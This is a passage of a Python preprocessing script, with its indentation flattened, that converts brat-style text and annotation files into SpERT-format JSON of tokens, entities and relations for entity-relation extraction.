text_list.append(temp_list)
return text_list
def convert_sentence_new(text):
#基于'. '来分割句子
space_all = find_all(' ', text)
sent_all = find_all('. ', text)
sent_all.append(10000000)
sent_list = []
for i in range(len(sent_all) - 1):
temp_list = []
temp_list.append(sent_all[i]+1)
for j in space_all:
if j>= sent_all[i] and j<= sent_all[i + 1]:
temp_list.append(j+1)
sent_list.append(temp_list)
return sent_list
def convert_ann(ann):
ann_list = ann.split('\n')
entity_list = []
for ann_line in ann_list:
ann_line = ann_line.split('\t')
if len(ann_line) > 2:
if ann_line[0][0] == 'T':
entity_list.append(ann_line)
return entity_list
def convert_relation(ann):
ann_list = ann.split('\n')
relation_list = []
for ann_line in ann_list:
ann_line = ann_line.split('\t')
if len(ann_line) > 2:
if ann_line[0][0] == 'R':
relation_list.append(ann_line)
return relation_list
def convert_entity(text, text_list, entity_list):
text_line = text.split('\n')
line_split = find_all('\n', text)
entity_result = []
for i in range(len(text_list)):
entity_result.append([])
for temp_entity in entity_list:
temp_result = {}
temp = (temp_entity[1]).split(' ')
start_temp = int(temp[1])
end_temp = int(temp[2])
temp_result['type'] = temp[0]
for row_index, row in enumerate(line_split):
if start_temp > row:
break
for start_word, ele in enumerate(text_list[row_index]):
if ele == start_temp:
temp_result['start'] = start_word
for end_word, ele in enumerate(text_list[row_index]):
if end_temp < ele:
temp_result['end'] = end_word
entity_result[row_index].append(temp_result)
return entity_result
#result = convert_entity(text, text_list, entity_list)
def convert_entity_v1(text, text_list, entity_list):
text_line = text.split('\n')
line_split = find_all('\n', text)
entity_result = []
for i in range(len(text_list)):
entity_result.append([])
for temp_entity in entity_list:
temp_result = {}
temp = (temp_entity[1]).split(' ')
start_temp = int(temp[1])
end_temp = int(temp[2])
temp_result['type'] = temp[0]
for row_index, row in enumerate(line_split):
if start_temp > row:
break
for start_word, ele in enumerate(text_list[row_index]):
if ele == start_temp:
temp_result['start'] = start_word-1
for end_word, ele in enumerate(text_list[row_index]):
if end_temp < ele:
temp_result['end'] = end_word-1
entity_result[row_index].append(temp_result)
return entity_result
def convert_entity_new(text, text_list, entity_list):
line_split = find_all('\n', text)
line_split.append(10000000)
entity_result = []
entity_dict ={}
for i in range(len(text_list)):
entity_result.append([])
for temp_entity in entity_list:
temp_result = {}
dict_temp = []
temp = (temp_entity[1]).split(' ')
start_temp = int(temp[1])
end_temp = int(temp[2])
temp_result['type'] = temp[0]
for row_index, row in enumerate(line_split):
if start_temp < row:
break
dict_temp.append(row_index-1)
for start_word, ele in enumerate(text_list[row_index-1]):
if ele == start_temp:
temp_result['start'] = start_word
for end_word, ele in enumerate(text_list[row_index-1]):
if end_temp < ele:
temp_result['end'] = end_word
break
# print(end_temp)
if end_temp > text_list[row_index-1][-1]:
temp_result['end'] = len(text_list[row_index-1])
entity_result[row_index-1].append(temp_result)
dict_temp.append(len(entity_result[row_index-1])-1)
entity_dict[temp_entity[0]] = dict_temp
return entity_result, entity_dict
'''
result, dict_test = convert_entity_new(text, text_list, entity_list)
relation = convert_relation(ann)
'''
def convert_entity_new_v1(text, text_list, entity_list):
line_split = find_all('. ', text)
line_split.append(10000000)
entity_result = []
entity_dict ={}
for i in range(len(text_list)):
entity_result.append([])
for temp_entity in entity_list:
temp_result = {}
dict_temp = []
temp = (temp_entity[1]).split(' ')
start_temp = int(temp[1])
end_temp = int(temp[2])
temp_result['type'] = temp[0]
for row_index, row in enumerate(line_split):
if start_temp < row:
break
dict_temp.append(row_index-1)
for start_word, ele in enumerate(text_list[row_index-1]):
if ele == start_temp:
temp_result['start'] = start_word-1
for end_word, ele in enumerate(text_list[row_index-1]):
if end_temp < ele:
temp_result['end'] = end_word-1
break
# print(end_temp)
if end_temp > text_list[row_index-1][-1]:
temp_result['end'] = len(text_list[row_index-1])
entity_result[row_index-1].append(temp_result)
dict_temp.append(len(entity_result[row_index-1])-1)
entity_dict[temp_entity[0]] = dict_temp
return entity_result, entity_dict
def convert_relation_new(relation, text_list, entity_dict):
relation_result = []
for i in range(len(text_list)):
relation_result.append([])
for relation_line in relation:
temp = (relation_line[1]).split(' ')
if temp[1][5] == 'T' and temp[2][5] == 'T':
arg1_temp = temp[1][5:]
arg2_temp = temp[2][5:]
if entity_dict[arg1_temp][0] == entity_dict[arg2_temp][0]:
temp_dict = {}
temp_dict['type'] = temp[0]
temp_dict['head'] = entity_dict[arg1_temp][1]
temp_dict['tail'] = entity_dict[arg2_temp][1]
relation_result[entity_dict[arg1_temp][0]].append(temp_dict)
return relation_result
def joint_entity_relation_token(text, entity_result, relation_result, id, documents):
text_line = text.split('\n')
#document = []
for i in range(len(entity_result)):
id = id + 1
document_dict = {}
document_dict['tokens'] = (text_line[i+1]).split(' ')
document_dict['entities'] = entity_result[i]
document_dict['relations'] = relation_result[i]
document_dict['orig_id'] = id
documents.append(document_dict)
return documents
def joint_entity_relation_token_v1(text, entity_result, relation_result, id, documents):
text_line = text.split('. ')
#document = []
for i in range(len(entity_result)):
id = id + 1
document_dict = {}
document_dict['tokens'] = (text_line[i+1]).split(' ')
document_dict['entities'] = entity_result[i]
document_dict['relations'] = relation_result[i]
document_dict['orig_id'] = id
documents.append(document_dict)
return documents
'''
tess = convert_relation_new(relation, text_list, dict_test)
document = joint_entity_relation_token(text, result, tess)
'''
def main( ):
documents =[]
textfiles = glob.glob('/home1/wlw2020/head_motion/SpERT/corpus/data/*.txt')
index = 1
for text_file in textfiles:
temp = text_file.split('.txt')
ann_temp = temp[0]
ann_file = ''.join([ann_temp, '.ann'])
with open(text_file) as f1:
text = f1.read()
with open(ann_file) as f2:
ann = f2.read()
text_list = convert_sentence_new(text)
#print(len(text_list[1]))
entity_list = convert_ann(ann)
entity_result, entity_dict = convert_entity_new_v1(text, text_list, entity_list)
relation = convert_relation(ann)
relation_result = convert_relation_new(relation, text_list, entity_dict)
documents = joint_entity_relation_token_v1(text, entity_result, relation_result, index, documents)
index = index + len(entity_result)
for document in documents:
if len(document['tokens']) <= 2:
documents.remove(document)
for document in documents:
if len(document['tokens']) <= 2:
documents.remove(document)
with open('./documents_example_v1.json', 'w') as f3:
json.dump(documents, f3)
if __name__ == '__main__':
main()
print('pku')
| 2.546875 | 3 |
Subsets and Splits